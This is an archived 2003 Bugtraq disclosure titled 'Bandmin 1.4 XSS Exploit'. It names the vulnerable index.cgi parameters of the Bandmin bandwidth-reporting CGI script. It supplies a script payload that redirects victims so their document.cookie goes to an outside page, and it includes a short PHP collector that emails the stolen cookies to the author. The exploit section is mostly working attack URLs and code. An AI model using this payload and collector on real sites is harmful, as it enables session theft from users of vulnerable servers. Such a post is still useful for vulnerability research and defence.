Bandmin 1.4 XSS Exploit

From: silent needel (silentneedle_at_hotmail.com)
Date: 05/28/03

  • Next message: bugzilla_at_redhat.com: "[RHSA-2003:186-01] Updated httpd packages fix Apache security vulnerabilities"
    Date: 28 May 2003 16:38:40 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Bandmin 1.4 XSS Exploit by Silent Needle

    A:BACKGROUND
    Bandmin is a cgi script show you the bandwidth for the sites in the server.

    B:DESCRIPTION
    The cross site scripting allow you to print a html or javascript or others
    in the webpage
    when it just open not write in the page.

    C:EXPLOIT
    These are the URLs of the exploits:
    1-there is two here
    http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]
    &month=[SECOND SCRIPT]
    2-one here
    http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=
    [THIRD SCRIPT]

    And you can steal cookie by changing [*** script] to
    <script>document.location='http://any-web-
    site/cookies.php?'+document.cookie</script>
    and in http://any-web-site/cookie.php put
    ----------------cookie.php-------------------
    <?
    mail("silentneedle@hotmail.com","cookies from bandmin",$http_cookie);
    echo $http_cookie;
    ?>
    -----------------------------------------------

    D:GREETZ
    To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN
    AWAY :)

    E:CONTACT
    Silent Needle
    silentneedle@hotmail.com

    F:OH LONG NIGHT
    Bye


  • Next message: bugzilla_at_redhat.com: "[RHSA-2003:186-01] Updated httpd packages fix Apache security vulnerabilities"

    Relevant Pages

    • Re: [SLE] Network File Systems
      ... this requires system administrators to rely on their ... the arguments supplied to strip out those that control the bandwidth ... The hard part is making it possible for the cover script to invoke the ... bandwidth-limiting option. ...
      (SuSE)
    • Message board abuse
      ... It seems that spamming message boards based on Matt Wrights wwwboard ... script is widespread and consumes a lot of bandwidth. ... Although my board has adequate bandwidth to be able to ignore ... In order to avoid being traced, the attacking script uses open ...
      (alt.computer.security)
    • Re: Girl Genius 18/07/07 - non-verbal communication
      ... We're working hard to find a new archive/update system (cgi script ... "Bandwidth" isn't the only thing the lack of which causes problems ... but a different sort of script. ...
      (rec.arts.sf.written)
    • Re: advance questions for me!
      ... Third party software or bandwidth throttling. ... Running mutiple web sites on a single IP address: ... >a script which is called like Plesk ... >server more secure after i download updateds,patchs and set the IIS ...
      (microsoft.public.inetserver.iis)
    • Re: Geoff - is your phmailform causing problems!!!!
      ... >My host has sent me something saying I am exceeding my bandwidth limit ... Well the script doesn't use any request variables and all variables are ... So I can't see how anyone can be hijacking the script but I'd ...
      (uk.net.web.authoring)